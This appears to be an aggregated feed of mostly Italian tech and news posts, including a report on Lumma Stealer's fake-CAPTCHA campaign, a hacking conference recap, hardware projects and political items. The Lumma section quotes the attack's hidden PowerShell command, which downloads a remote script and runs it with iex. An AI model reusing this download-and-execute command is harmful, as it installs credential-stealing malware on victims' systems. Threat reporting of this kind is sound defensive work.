Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile
Lumma Stealer è un noto malware specializzato nel furto di informazioni, attivo sin dalla metà del 2022. Negli ultimi mesi ha mostrato un’evoluzione significativa nelle sue modalità operative, adottando nuove tattiche, tecniche e procedure. Questa minaccia è sempre più presente nei report relativi agli incidenti di sicurezza informatica: solo nell’ultimo anno, sono state registrate migliaia di compromissioni attribuite al malware.
Si ritiene che abbia origini nell’ambiente cybercriminale russo e venga attualmente distribuito come Malware-as-a-Service (MaaS). I suoi creatori offrono aggiornamenti frequenti e assistenza agli utenti tramite canali Telegram e una documentazione ospitata su Gitbook. L’obiettivo principale di Lumma Stealer è l’esfiltrazione di dati sensibili, come credenziali di accesso, token di sessione, wallet di criptovalute e informazioni personali raccolte dai dispositivi infetti.
Ciò che rende Lumma particolarmente pericoloso sono le sue sofisticate tecniche di distribuzione, che di recente si sono espanse fino a includere l’ingegneria sociale attraverso false domande CAPTCHA e ingannevoli richieste di download. Questi metodi sfruttano la fiducia degli utenti nei processi di verifica di sicurezza più noti , inducendo le vittime a eseguire comandi dannosi sui propri sistemi.
I ricercatori di Sophos hanno identificato diverse campagne Lumma Stealer durante l’autunno e l’inverno 2024-25, documentando come le tattiche del malware si sono evolute per eludere il rilevamento. “Le variazioni che abbiamo riscontrato nel comportamento di Lumma Stealer sono significative per i difensori”, ha osservato il team Sophos Managed Detection and Response nel suo report, sottolineando che queste tecniche di distribuzione potrebbero essere facilmente adattate ad altri malware oltre a Lumma Stealer.
Un’innovazione particolarmente preoccupante riguarda l’abuso di Windows PowerShell attraverso pagine di verifica CAPTCHA ingannevoli.
Una casella di verifica dall’aspetto familiare (Fonte Sophos)
In questa catena di attacchi, alle vittime che visitano siti dannosi viene presentata una richiesta di verifica standard “Non sono un robot”, creando un falso senso di sicurezza e legittimità. Dopo aver cliccato sulla casella di verifica, gli utenti vengono reindirizzati a una seconda pagina che chiede loro di caricare il comando “Esegui” di Windows, quindi premere Ctrl+V seguito da Invio.
La successiva richiesta di “controllo di sicurezza” è un po’ insolita, ma abbastanza semplice per gli utenti incauti (Fonte Sophos)
Questa azione apparentemente innocua in realtà incolla ed esegue un comando PowerShell nascosto che opera in una finestra nascosta:
C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t
L’esecuzione di questo comando avvia un sofisticato processo di attacco multifase. Lo script recupera componenti malware aggiuntivi dai server di comando e controllo, scaricando, estraendo ed eseguendo il payload principale di Lumma Stealer. Una volta attivo, questo malware accede sistematicamente ai dati del browser, come evidenziato nella Figura 6, dove Autolt3.exe accede ai dati di accesso e ai cookie di Chrome.
Flusso di attacco con abuso CAPTCHA (Fonte Sophos)
Ciò che rende questo vettore di attacco particolarmente efficace è l’impiego della crittografia AES per nascondere i payload successivi. Il malware impiega sofisticate tecniche di offuscamento, tra cui l’impiego di vettori di inizializzazione e complesse routine di decrittazione, per eludere le tradizionali misure di sicurezza. Questa combinazione di ingegneria sociale e metodi tecnici avanzati rappresenta un’evoluzione significativa nelle capacità di Lumma Stealer.
Gli esperti di sicurezza raccomandano di implementare soluzioni di protezione degli endpoint robuste con funzionalità di analisi comportamentale, poiché il solo rilevamento basato sulle firme si rivela inadeguato contro queste minacce in continua evoluzione.
L'articolo Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile proviene da il blog della sicurezza informatica.
Operazione El Rais. Traffico di migranti gestito da egiziani smantellato dalla nostra Polizia di Stato in un contesto di cooperazione nell'ambito di una Operational Task Force di Europol
È stato estradato in Italia dall’Albania un egiziano arrestato nell’ambito dell’Operazione “El Rais”, condotta dalla Polizia di Stato di Siracusa e dal Servizio Centrale Operativo, coordinata dalla locale Direzione Distrettuale Antimafia (DDA). L’uomo è giunto a bordo di un volo partito da Tirana e atterrato nelle prime ore del pomeriggio presso l’Aeroporto di Fiumicino, scortato dagli agenti del Servizio per la Cooperazione Internazionale di Polizia e successivamente recluso presso la Casa Circondariale di Roma Rebibbia, a disposizione dell’Autorità Giudiziaria.
Si tratta di un ulteriore e significativo risultato ottenuto grazie alla sinergia e collaborazione tra le autorità italiane e quelle albanesi (Dipartimento Polizia Criminale – Forza Operazionale) con il contributo dell’Ufficio dell’Esperto per la Sicurezza operativo in Albania, che consentirà di processare in Italia uno dei componenti della complessa rete criminale dedita al traffico di migranti, operante tra l’Egitto, la Turchia e la Grecia.
L’attività, in particolare, rappresenta un seguito della vasta operazione (denominata “El Rais”) conclusa lo scorso 8 aprile, con l’esecuzione dell’ordinanza di custodia cautelare a carico di 15 egiziani ritenuti appartenenti ad uno dei più articolati e ben organizzati sodalizi dediti al traffico di migranti sulla Rotta del Mediterraneo Orientale, che si stima abbia favorito l’ingresso clandestino in Italia di almeno 3 mila persone, a partire dal 2021 a oggi, con introiti per l’organizzazione criminale di almeno 30 milioni di dollari.
L’indagine ha visto il coinvolgimento di diverse autorità e Forza di Polizia estere (albanesi, tedesche, turche e omanite), coordinate dal Servizio per la Cooperazione Internazionale di Polizia della Direzione Centrale della Polizia Criminale.
L'ordinanza era stata emessa dal Giudice per le Indagini Preliminari presso il Tribunale di Catania a seguito dell’imponente attività investigativa coordinata da questa Procura della Repubblica – Direzione Distrettuale Antimafia, condotta dal Servizio Centrale Operativo (SCO) e dalla Squadra Mobile di Siracusa in stretta sinergia con la Divisione Interpol del Servizio per la Cooperazione Internazionale di Polizia e l’Agenzia Europea EUROPOL nell’ambito dell’Operational Task Force (OTF) del “Mediterraneo orientale“.
Una operational task force di Europol è un gruppo di lavoro temporaneo e flessibile composto da esperti di polizia e investigatori provenienti da diversi paesi europei. Queste task force vengono create per affrontare specifiche minacce criminali transnazionali, come il traffico di droga, il terrorismo, il cybercrimine e altre forme di criminalità organizzata. Le principali caratteristiche di una operational task force di Europol sono:
Composizione flessibile: I membri provengono da diverse agenzie di contrasto al crimine dei paesi UE, a seconda delle esigenze dell'operazione. Obiettivi mirati: Sono create per indagare su specifici casi o fenomeni criminali di rilevanza internazionale. Coordinamento centralizzato: Vengono coordinate da Europol per massimizzare l'efficacia delle operazioni congiunte. Durata limitata: Hanno una durata limitata, attiva solo per il tempo necessario a raggiungere gli obiettivi dell'indagine.
#otf #Europol #serviziocentraleoperativo #sco #servizioperlacooperazioneinternazionaledipolizia #cooperazioneinternazionaledipolizia #direzionecentraledellapoliziacriminale #elrais #UfficiodellEspertoperlaSicurezza #trafficodiesseriumani
Notizie dall'Italia e dal mondo reshared this.
The ZX Spectrum Logic Analyzer
We know [Happy Little Diodes] frequently works with logic analyzer projects. His recent wireless logic analyzer for the ZX Spectrum is one of the oddest ones we’ve seen in a while. The heart of the system is an RP2040, and there are two boards. One board interfaces with the computer, and another hosts the controller.
The logic analyzer core is powered by a common open-source analyzer from [Eldrgusman]. This is one of the nice things about open source tools. Most people probably don’t need a logic analyzer that plugs directly into a ZX Spectrum. But if you do, it is fairly simple to repurpose a more generic piece of code and rework the hardware, if necessary.
You used to pay top dollar to get logic analyzers that “knew” about common CPUs and could capture their bus cycles, show execution, and disassemble the running code. But using a technique like this, you could easily decode any processor, even one you’ve designed yourself. All you need to do is invest the time to build it, if no one else has done it yet.
[Happy Little Diodes] is a big fan of the [Eldrgusman] design. What we would have given for a logic analyzer like this forty years ago.
youtube.com/embed/IHbIW8pi4Vo?…
Indipendenza tecnologica: La Cina Costruisce il suo Cloud solo con tecnologie domestiche
Basta Intel, AMD, NVIDIA. ora tutto è realizzato in casa come la soluzione cloud di Inspur, uno dei principali fornitori di infrastrutture server in Cina. L’azienda cinese Loongson ha annunciato un traguardo importante: più di cento prodotti diversi ora funzionano con processori LoongArch.
Progettata per rafforzare l’indipendenza tecnologica del Paese, la piattaforma LoongArch incorpora i migliori sviluppi di MIPS e RISC-V. I microcircuiti creati utilizzando questa tecnologia vengono già integrati in apparecchiature industriali, personal computer e server. Sebbene siano ancora indietro rispetto ai modelli di punta x86 e Arm, stanno rapidamente recuperando terreno.
Lo scorso autunno, le autorità cinesi hanno invitato le aziende locali a scegliere microprocessori prodotti locali, dichiarando inaffidabili quelli esteri. L’elenco attuale dei chip testati non include prodotti AMD e Intel, ma sono comparse due opzioni di uno sviluppatore nazionale.
La paranoia digitale oggi è il nuovo buon senso.
Tuttavia, anche gli utenti più convinti dell’idea di sovranità tecnologica non acquisteranno dispositivi che non supportino il software necessario. Tenendo conto di ciò, l’azienda pubblica sistematicamente un catalogo dei programmi supportati, indicando sia le soluzioni già pronte sia quelle in fase di finalizzazione.
Il nuovo catalogo di aprile è stato integrato con un sistema cloud di Inspur. La versione precedente del documento faceva riferimento alla soluzione completa di Lenovo per i data center.
La reputazione di Inspur è confermata dalla sua collaborazione con i più grandi giganti tecnologici cinesi: Alibaba e Tencent. Dopo che gli Stati Uniti hanno aggiunto l’azienda alla Entity List delle sanzioni nel 2023, la sua capacità di collaborare con partner americani è stata seriamente limitata. Tuttavia, l’azienda serve con successo un’ampia base di clienti nazionali, offrendo sia hardware sia il suo sistema operativo proprietario InCloud OS per l’implementazione di servizi cloud.
L’integrazione di InCloud OS, basata sulle fondamenta di OpenStack, rafforza significativamente la posizione di LoongArch nel segmento dei sistemi ad alto carico. Di particolare interesse è il chip a 64 core recentemente presentato, che ha la capacità di installare due di questi chip in un unico sistema.
Nel mercato interno, l’ingegno tecnologico di Loongson si confronta con gli sviluppi di Alibaba e Huawei. Tuttavia, le loro soluzioni si basano sull’architettura Arm, che nelle attuali realtà geopolitiche potrebbe rivelarsi un punto debole.
Pechino sostiene attivamente i leader tecnologici nazionali sulla scena mondiale, sfruttando la situazione di stallo commerciale con Washington per rafforzare l’immagine di partner affidabile. Questo approccio potrebbe anche aiutare Loongson ad espandere la sua presenza internazionale.
L'articolo Indipendenza tecnologica: La Cina Costruisce il suo Cloud solo con tecnologie domestiche proviene da il blog della sicurezza informatica.
RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag
Sabato 9 maggio, al Teatro Italia di Roma, si è chiusa la Red Hot Cyber Conference 2025, l’appuntamento annuale gratuito creato dalla community di RHC dedicato alla sicurezza informatica, alle tecnologie digitali emergenti, ma soprattutto ai giovani, sempre più numerosi ed appassionati ad ogni edizione e alla consapevolezza del rischio.
Massimiliano Brolli, il founder di Red Hot Cyber, ha dedicato moltissimo impegno nella creazione di questo evento e della community, per promuovere una visione etica in un mondo digitale.
Come cita il manifesto di RHC, “dalle ceneri del cyberpunk e dei vecchi gruppi hacker del passato che non si sono mai rassegnati a combattere per un mondo digitalmente più onesto e giusto, questo movimento di frontiera, vuole essere una voce fuori dal coro nel costruire dal basso un cambiamento, cercando di promuovere la cultura dell’hacking interdisciplinare, permettendo così all’Italia di incubare nuovi talenti che in futuro potranno renderci nuovamente protagonisti nella scena internazionale.“
I protagonisti del panel: Ivano Gabrielli, Luigi Montuori, Paolo Galdieri e Giuseppe Corasaniti
Protagonisti del panel sono state importanti figure istituzionali, tra cui il prezioso intervento di Ivano Gabrielli, Direttore della Polizia Postale, che ha portato il suo contributo in qualità di massimo responsabile del Servizio Polizia Postale e delle Comunicazioni, con una lunga esperienza nel contrasto al cybercrime e nella protezione delle infrastrutture critiche, Luigi Montuori, Direttore Dipartimento sanità e ricerca presso il Garante per la protezione dei dati personali, l’immancabile Paolo Galdieri, avvocato penalista, Cassazionista e docente universitario di Diritto penale dell’informatica e Giuseppe Corasaniti, ex magistrato e oggi Professore di infromatica guridica ed etica digitale all’Università Mercatorum, le cui interviste esclusive, insieme a quella di Luca Piccinelli, CISO Huawei Italia, Gabriele Faggioli di Clusit e Flavia Rizza sul cyberbullismo, saranno presto disponibili sul canale YouTube di Red Hot Cyber.
Verrà anche pubblicato un video al giorno dell’evento, seguendo il programma della conferenza, insieme alla galleria fotografica di una conferenza che si conferma punto di riferimento della cybersecurity italiana e catalizzatore per le nuove generazioni.
Abbiamo infatti approfondito, con loro temi come la situazione dell’Italia in questo momento storico, del lato oscuro dell’IA, di cyber resilienza e cyber deterrenza, di transizione al Cloud, delle nuove figure emergenti con grandi capacità tecniche nelle indagini informatiche, di software spia, di attacchi APT alle telecomunicazioni ma anche di reti 5g, di Nis2, del confine invisbile tra crimine informatico e cyber terrorismo visto da un ex magistrato e molto altro ancora!
Red Hot Cyber 2025: gli interventi e i workshop
Ma sul palco del Teatro Italia, non sono mancate altre figure di spicco nel panorama della sicurezza informatica, come Aldo Di Mattia, Direttore SSE and Cybersecurity Advisor Italy & Malta che ha parlato della sfida impari tra Infrastrutture critiche e cybercriminali, Sunil Venazini, Principle Sales Engineer, che ha mostrato strategie e strumenti nell’era dell’IA tra attaccanti e difensori, il mitico Corrado Giustozzi, Founding Partner & Security Strategist, Resilience, che ha portato sul palco “La scomoda eredità della filosofia Hippie”. Ma non solo, Donato Onofri, Senior Red Team Engineer Crowdstrike ha parlato al pubblico di “The Rise of Patchless Attacks: Eccezioni Fantastiche e Dove Trovarle”, Michele Mezza, giornalista e docente della Federico II di Napoli, autore di Net War, che con il suo intervento ci ha parlato di “informazione come linguaggio della guerra ibrida”, seguiti dai ‘nostri’ Stefano Gazzella, giornalista e Data Protection Officer, con “Cani da Guardia 4.0,Informazione e Divulgazione Cyber” e Pietro Melillo, CISO di Wuerth Italia, con “Un anno di DarkLab tra Intelligence a Threat Actors e non ultimi Agostino Pellegrino, Cyber Security Expert. che con il suo speech “Phishing Avanzato, Inganno, Intelligence e Attacchi Omografici” ci ha illustrato come una Wi-Fi può venire hackerata, Roberto Camerinesi, ethical hacker e CTO di Cyber Evolution, che ha portato tra il pubblico le nuove frontiere dell’hacking satellitare con “Houston, abbiamo un problema”, ed infine il geniale e divertente Antonio Montillo, ethical hacker e ricercatore di sicurezza, con il suo immancabile cappello da “Malware Chef” che ha condiviso una delle sue migliori ricette: “Come Cucinare Una LLM Backdoor”.
Nella lunga lista poi non si possono dimenticare gli interventi di Luca Almici, CEO di Enterprise con “Log Management e Sicurezza”, Luigi Martire, Cyber Threat Intelligence Analyst di Tinexta con “Threat intelligence e attribution: aaccia agli APT”, Selene Giupponi, Manager Director Europe Resecurity, con “Le Nuove Frontiere Della CTI Nell’era Dell’intelligenza Artificiale”. Questa lunga lista non sarebbe completa senza Nicola Dalla Vecchia, Senior Solutions Engineer, con “Attacchi alle API: il bersaglio nascosto della tua infrastruttura”, Irene Sorani, esperta di sicurezza informatica con “La strada lastricata di buone intenzioni: Verso Il Disastro Perfetto”, Raniero Rapone, Cyber Security Consulting Director & CYRAA Design Lead, con “Cyber Risk: quanto pensi di conoscerlo?” Giuliano Rulli, COO Oplium Italia con ”Il lato oscuro del Cloud: i dati sono al sicuro?”, Diego Fasano, CEO di Ermetix con “Anatomia di un attacco Mobile: sorveglianza elettronica ed esfiltrazione dati” Dario Pasquini, Andrea Paita, Cybersecurity Services Manager con “Cyber Threat Intelligence e AI: Tecnologie e Strumenti Al Servizio Del SOC”, Andrea Acito, Manging Director di Digimat con l’attualismo “Cybersecurity per le PMI: Dalla Consapevolezza alla Difesa Attiva” e Dario Pasquini, Principal Researcher at RSAC, con “Hacking back the AI hacker: defending against LLM-Driven cyberattacks”
L’inaugurazione dell’8 maggio ha coinvolto gli ospiti con i tradizionali workshop ‘hands-n’ realizzati in collaborazione con Accenture Italia, nei quali i partecipanti hanno potuto sperimentare direttamente le tecnologie con esercizi ad hoc mirati a perfezionare le competenze apprese come la creazione di un sistema IA di Visual Object Tracking, come hackerare un sito wordpress oppure entrare nel Dark Web in sicurezza. Si è dato anche spazio anche ad argomenti come il cyberbullismo con Flavia Rizza o la social engineering con la scoperta dei deepfake emergenti.
Red Hot Cyber Conference: la Capture The Flag
Lo stesso giorno è stata inaugurata la terza Capture The Flag (CTF) di Red Hot Cyber, realizzata in collaborazione con CyberSecurityUp di Fata Informatica, Hackmageddon World e la Fondazione Bruno Kessler (FBK), con le challenge relative all’ingegneria sociale. La sfida, che è stata coordinata dagli ethical hacker Antonio Montillo, Vincenzo Alonge, Andrea Tassotti, Thomas Kirschner, il collettivo hacker Hackerwood e il ricercatore di sicurezza Daniele Santoro, ha messo alla dura prova molti partecipanti.
L’obiettivo dei 111 hacker distribuiti in 32 team è stato quello di colpire le infrastrutture critiche di uno stato oltre alla presenza di una bomba da dissinescare.
I vincitori dell’edizione RHC 2025, premiati la sera del 9 maggio, dopo due giorni di straordinario impegno, sono stati gli imbattibili PizzaFeijoda, seguiti dagli emergenti Winnerz e i veterani CarbonHackers.
Ancora una volta la Capture The Flag tra sfide di social engineering, analisi e crittografia, exploit di vulnerabilità, web hacking e altro ancora si è dimostrata un modo per sviluppare le capacità di problem solving, di improvvisazione e creatività, di pensiero critico, spirito di squadra e di strategia difensiva e offensiva, ma soprattutto ad essere stata premiata sono state la tenacia e la perseveranza, doti fondamentale per un hacker, così come per chiunque lavori nel campo della cybersecurity o dell’informatica in generale, perché senza anche il talento più brillante rischierebbe di non arrivare lontano.
Un appuntamento consolidato, giunto alla sua quarta edizione
Un’esperienza da ripetere? Sì, l’esperienza della Red Hot Cyber Conference si sta consolidando come un appuntamento fisso per i partecipanti, grazie all’elevato livello dei contenuti, alla presenza di ospiti di rilievo e all’attenzione verso la formazione dei giovani talenti. L’evento, giunto alla sua quarta edizione, continua a crescere in partecipazione e qualità, proponendo workshop pratici, competizioni di hacking e conferenze con esperti e rappresentanti istituzionali, un mix che rende la conferenza di RHC un’occasione imperdibile per chiunque sia interessato alla cybersecurity, all’innovazione tecnologica e alla cultura digitale, con un programma che punta a ripetersi e migliorarsi negli anni a venire!
L'articolo RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag proviene da il blog della sicurezza informatica.
Semiconductor Simulator Lets You Play IC Designer
For circuit simulation, we have always been enthralled with the Falstad simulator which is a simple, Spice-like simulator that runs in the browser. [Brandon] has a simulator, too, but it simulates semiconductor devices. With help from [Paul Falstad], that simulator also runs in the browser.
This simulator takes a little thinking and lets you build devices as you might on an IC die. The key is to use the drop-down that initially says “Interact” to select a tool. Then, the drop-down below lets you select what you are drawing, which can be a voltage source, metal, or various materials you find in semiconductor devices, like n-type or a dielectric.
It is a bit tricky, but if you check out the examples first (like this diode), it gets easier. The main page has many examples. You can even build up entire subsystems like a ring oscillator or a DRAM cell.
Designing at this level has its own quirks. For example, in the real world, you think of resistors as something you can use with great precision, and capacitors are often “sloppy.” On an IC substrate, resistors are often the sloppy component. While capacitor values might not be exact, it is very easy to get an extremely precise ratio of two capacitors because the plate size is tightly controlled. This leads to a different mindset than you are used to when designing with discrete components.
Of course, this is just a simulation, so everything can be perfect. If, for some reason, you don’t know about the Falstad simulator, check it out now.
Blob URI: la nuova frontiera del phishing per aggirare i controlli di sicurezza
@Informatica (Italy e non Italy 😁)
È stata identificata una nuova tecnica di phishing che usa i Blob URI, ossia URL per il browser validi solo all’interno della sessione dell’utente. Trattandosi di contenuti locali, tali link non possono essere analizzati dai tradizionali
Informatica (Italy e non Italy 😁) reshared this.
A Single-Pixel Camera Without Moving Parts Using Compressed Sensing
One of the reconstructed images, using all 4,096 matrix patterns as input, next to the original object. (Credit: okooptics, Jon Bumstead)
There’s a strange allure to single-pixel cameras due to the simultaneous simplicity and yet fascinating features that they can offer, such as no set resolution limit. That said, the typical implementations that use some kind of scanning (MEMS) mirror or similar approach suffer from various issues even when you’re photographing a perfectly stationary and static scene due to their complex mechanical nature. Yet there’s a way around this, involving a LED matrix and a single photoresistor, as covered by [Jon Bumstead] in an article with accompanying video.
As he points out, this isn’t a new concept, with research papers cited that go back many years. At the core lies the signal processing technique called compressed sensing, which is incidentally also used with computed tomography (CT) and magnetic resonance imaging (MRI) scanners. Compressed sensing enables the reconstruction of a signal from a series of samples, by using existing knowledge of the signal.
In the case of this single-pixel camera, the known information is the illumination, which is a Hadamard matrix pattern displayed on the 64 x 64 pixel LED matrix, ergo 4,096 possible patterns. A total of 4,096 samples are thus recorded, which are subsequently processed with a Matlab script. As pointed out, even 50% of the maximum possible matrices can suffice here, with appropriately chosen patterns.
While not an incredibly fast method, it is fully solid-state, can be adapted to use other wavelengths, and with some tweaking of the used components probably could cut down the sampling time required.
youtube.com/embed/EE9AETSoPHw?…
Work, Eat, Sleep, Repeat: Become a Human Tamagotchi
When [Terence Grover] set out to build a Tamagotchi-inspired simulator, he didn’t just add a few modern tweaks. He ditched the entire concept and rebuilt it from the ground up. Forget cute wide-eyed blobby animals and pixel-poop. This Raspberry Pi-powered project ditches nostalgia in favour of brutal realism: inflation, burnout, capitalism, and the occasional existential crisis. Think Sims meets cyberpunk, rendered charmingly in Python on a low-res RGB LED matrix.
Instead of hunger and poop meters, this dystopian pet juggles Maslow’s hierarchy: hunger, rest, safety, social life, esteem, and money. Players make real-life-inspired decisions like working, socialising, and going into education – each affecting the stats in logical (and often unfair) ways. No free lunch here: food requires money, money requires mind-numbing labour, and labour tanks your rest. You can even die of overwork à la Amazon warehouse. The UI and animation logic are all hand-coded, and there’s a working buzzer, pixel-perfect sprite movement, and even mini-games to simulate job repetition.
It’s equal parts social commentary and pixel art fever dream. While we have covered Tamagotchi recreations some time ago, this one makes you the needy survivor. Want your own dystopia in 64×32? Head over to [Terence Grover]’s Github and fork the full open source code. We’ll be watching. The Tamagotchi certainly is.
youtube.com/embed/edaDDDNEmvw?…
L'interesse per l'AI ha media nulla.
Ovvero... da una parte c'è il gruppo di chi è certo sarà il futuro dell'umanità e che grazie a lei supereremo in un attimo tutti i problemi con cui la nostra specie si è dovuta confrontare negli ultimi 10.000 anni e dall'altra il gruppo di quelli che la considerano il Maligno in formato binario.
Tra i due, il (quasi) nulla.
Ora... calcolate la media e ditemi se mi sono sbagliato.
Unwinding an Unusual Slide Rule
If the Otis King slide rule in [Chris Staecker’s] latest video looks a bit familiar, you might be getting up there in age, or you might remember seeing us talk about one in our collection. Actually, we have two floating around one of the Hackaday bunkers, and they are quite the conversation piece. You can watch the video below.
The device is often mistaken for a spyglass, but it is really a huge slide rule with the scale wrapped around in a rod-shaped form factor. The video says the scale is the same as a 30-inch scale, but we think it is closer to 66 inches.
Slide rules work using the idea that adding up logarithms is the same as multiplying. For example, for a base 10 logarithm, log(10)=1, log(100)=2, and log(1000)=3. So you can see that 1+2=3. If the scales are printed so that you can easily add and then look up the antilog, you can easily figure out that 10×100=1000.
The black center part acts like a cursor on a conventional slide rule. How does it work? Watch [Chris’] video and you’ll see. We know from experience that one of these in good shape isn’t cheap. Lucky that [Chris] gives us a 3D printed version so you can make your own.
Another way to reduce the scale is to go circular, and you can make one of those, too.
youtube.com/embed/h1p4OwDb0Hw?…
Dobbiamo tollerare gli intolleranti? – Ben(e)detto
@Politica interna, europea e internazionale
L'articolo Dobbiamo tollerare gli intolleranti? – Ben(e)detto proviene da Fondazione Luigi Einaudi.
Politica interna, europea e internazionale reshared this.
Carla Hayden, la prima bibliotecaria nera del Congresso, è stata licenziata da Trump
La bibliotecaria del Congresso Carla Hayden è stata licenziata all'improvviso dal presidente Donald Trump, nel contesto degli sforzi dell'amministrazione per epurare i dipendenti federali che, a suo dire, si oppongono al suo programma.
Hayden, confermata dal Senato nel 2016, è stata la prima donna e la prima afroamericana a dirigere la Biblioteca del Congresso, che custodisce una vasta collezione di libri, documenti storici e preziosi manufatti del Paese. Il suo licenziamento è avvenuto in seguito alle critiche dell'American Accountability Foundation (AAF), un gruppo di pressione conservatore che ha accusato Hayden e altri funzionari della biblioteca di promuovere libri con "contenuti radicali" e materiale scritto da oppositori di Trump.
"L'attuale #Bibliotecaria del Congresso Carla Hayden è un soggetto woke, anti-Trump e promuove i ragazzi transgender", ha scritto AAF su X, poche ore prima che la notizia del licenziamento di Hayden diventasse pubblica. "È ora di mandarla FUORI e assumere qualcuno nuovo per il lavoro!"
reshared this
Google paga 1,375 miliardi al Texas: la multa sulla privacy più alta di sempre
Google ha accettato di pagare allo Stato del Texas 1,375 miliardi di dollari per risolvere due cause legali sulla privacy. L’azienda è stata accusata di tracciare la posizione degli utenti e di archiviare i loro dati biometrici, tra cui impronte vocali e geometrie facciali, senza il loro consenso.
L’importo del pagamento supera tutte le sanzioni precedentemente imposte da Google in casi simili. In precedenza, nel novembre 2022, la società aveva accettato di pagare 391 milioni di dollari a un gruppo di 40 stati. A gennaio 2023, 29,5 milioni di dollari all’Indiana e a Washington e a settembre, 93 milioni di dollari alla California.
La causa, intentata nel 2022, riguardava la raccolta di dati di geolocalizzazione , attività in modalità di navigazione in incognito e dati biometrici . Secondo i procuratori, Google ha monitorato gli utenti anche quando la funzione Cronologia delle posizioni era disattivata e ha memorizzato i dati biometrici senza preavviso.
“Per anni, Google ha tracciato segretamente i movimenti delle persone, le ricerche private, le impronte vocali e la geometria facciale attraverso i suoi prodotti e servizi”, ha affermato il procuratore generale del Texas Ken Paxton. Ha sottolineato che l’accordo rappresenta una “vittoria storica” per la privacy dei residenti dello Stato.
In risposta alle critiche, Google ha modificato il modo in cui archivia i dati degli utenti: Maps Timeline viene ora archiviato localmente sui dispositivi anziché nel cloud. Sono stati introdotti anche nuovi strumenti che consentono di eliminare automaticamente la cronologia delle posizioni.
Meta, accusata anche di aver raccolto illegalmente i dati biometrici di milioni di utenti, in precedenza aveva pagato la somma equivalente a 1,4 miliardi di dollari al Texas.
Questa iniziativa si inserisce nel contesto della crescente attenzione rivolta alle attività di Google negli Stati Uniti e in Europa. Le autorità di regolamentazione chiedono che il monopolio dell’azienda venga limitato e che venga rivisto il suo approccio al trattamento dei dati personali.
L'articolo Google paga 1,375 miliardi al Texas: la multa sulla privacy più alta di sempre proviene da il blog della sicurezza informatica.
Liberato il soldato Edan Alexander, ma a Gaza si continua a morire
@Notizie dall'Italia e dal mondo
Il rilascio del militare israelo-statunitense è un gesto di buona volontà verso Trump. Nella Striscia però nulla cambia. L’Unicef lancia l’allarme: 71.000 bambini rischiano la malnutrizione acuta
L'articolo Liberato il soldato Edan Alexander, ma a Gaza si continua a morire
Notizie dall'Italia e dal mondo reshared this.
Scuola di Liberalismo 2025 – Messina: Annamaria ANSELMO: «Discorso sulla servitù volontaria» (Étienne de La Boétie)
@Politica interna, europea e internazionale
Ottavo appuntamento dell’edizione 2025 della Scuola di Liberalismo di Messina, promossa dalla Fondazione Luigi Einaudi ed organizzata in collaborazione con l’Università degli Studi di
Politica interna, europea e internazionale reshared this.
Il PKK depone le armi e si dissolve. E’ la strada giusta la questione curda?
@Notizie dall'Italia e dal mondo
Una svolta che non scioglie i nodi della questione curda in Turchia e nella regione. Incerta la sorte del leader Ocalan in prigione da decenni. Interrogativi sul ruolo delle milizie YPG nel Rojava
L'articolo Il PKK depone le armi e si dissolve. E’ la
Notizie dall'Italia e dal mondo reshared this.
Semiconductor Simulator Lets Your Play IC Designer
For circuit simulation, we have always been enthralled with the Falstad simulator which is a simple, Spice-like simulator that runs in the browser. [Brandon] has a simulator, too, but it simulates semiconductor devices. With help from [Paul Falstad], that simulator also runs in the browser.
This simulator takes a little thinking and lets you build devices as you might on an IC die. The key is to use the dropdown that initially says “Interact” to select a tool. Then, the drop-down below lets you select what you are drawing, which can be a voltage source, metal, or various materials you find in semiconductor devices, like n-type or a dielectric.
It is a bit tricky, but if you check out the examples first (like this diode), it gets easier. The main page has many examples. You can even build up entire subsystems like a ring oscillator or a DRAM cell.
Designing at this level has its own quirks. For example, in the real world, you think of resistors as something you can use with great precision, and capacitors are often “sloppy.” On an IC substrate, resistors are often the sloppy component. While capacitor values might not be exact, it is very easy to get an extremely precise ratio of two capacitors because the plate size is tightly controlled. This leads to a different mindset than you are used to when designing with discrete components.
Of course, this is just a simulation, so everything can be perfect. If, for some reason, you don’t know about the Falstad simulator, check it out now.
reshared this
#USA e #Israele, il cuneo di #Gaza
USA e Israele, il cuneo di Gaza
Il fronte filo-sionista e i media ufficiali in Occidente sono in pieno fermento da alcuni giorni per la possibile clamorosa rottura che si starebbe consumando tra il presidente americano Trump e il governo di ultra-destra israeliano del primo ministr…www.altrenotizie.org
Keebin’ with Kristina: the One With the MingKwai Typewriter
Sometimes, a little goes a long way. I believe that’s the case with this tiny media control bar from [likeablob] that uses an ESP32-C3 Super Mini.
Image by [likeablob] via Hackaday.IOFrom left to right you’ve got a meta key that allows double functions for all the other keys. The base functions are play/pause, previous track, and next track while the knob handles volume.
And because it uses this Wi-Fi-enabled microcontroller, it can seamlessly integrate with Home Assistant via ESPHome.
What else is under the hood? Four low-profile Cherry MX Browns and a rotary encoder underneath that nicely-printed knob.
If you want to build one of these for yourself, all the files are available on GitHub including the customizable enclosure which [likeablob] designed with OpenSCAD.
Portable Endgame, If It Exists
Perhaps [Palpatine]’s one mistake in creating this 36-key portable endgame is believing in the idea of the endgame in the first place. But I’m not here to judge.
Image by [Palpatine] via redditOh wait, yes I am! I really like this keyboard, and I think it would look right at home on the desk of the centerfold below it, although it’s supposed to be a go-anywhere contraption. Be sure to check out the gallery on this one to see it folded together for transport.
It would seem that [Palpatine] learned some nice tricks while designing this keyboard. Have you heard of 10440 batteries? They’re 3.7 V and usually cheaper than the square Li-Po batteries of the same size.
This bad boy is based on the Seeed Xiao nRF52840, which [Palpatine] believes is worth spending a little bit of extra money on instead of nice!nano clones, while being cheaper than an actual nice!nano would be.
As far as open-sourceness goes, [Palpatine] seems willing to share their design files, although they don’t seem to have been published anywhere at this time.
The Centerfold: White Light Might Bite At Night
Image by [Embarrased-Yak-3766] via redditSo this one isn’t quite as wide as usual, but it’s definitely more white than usual. I suppose that wiiiide monitor makes up for the missing pixels.
What do you think? Crisp and clean, or cold and clinical? I can’t decide. I definitely feel snowbound vibes, and I want to sleep in.
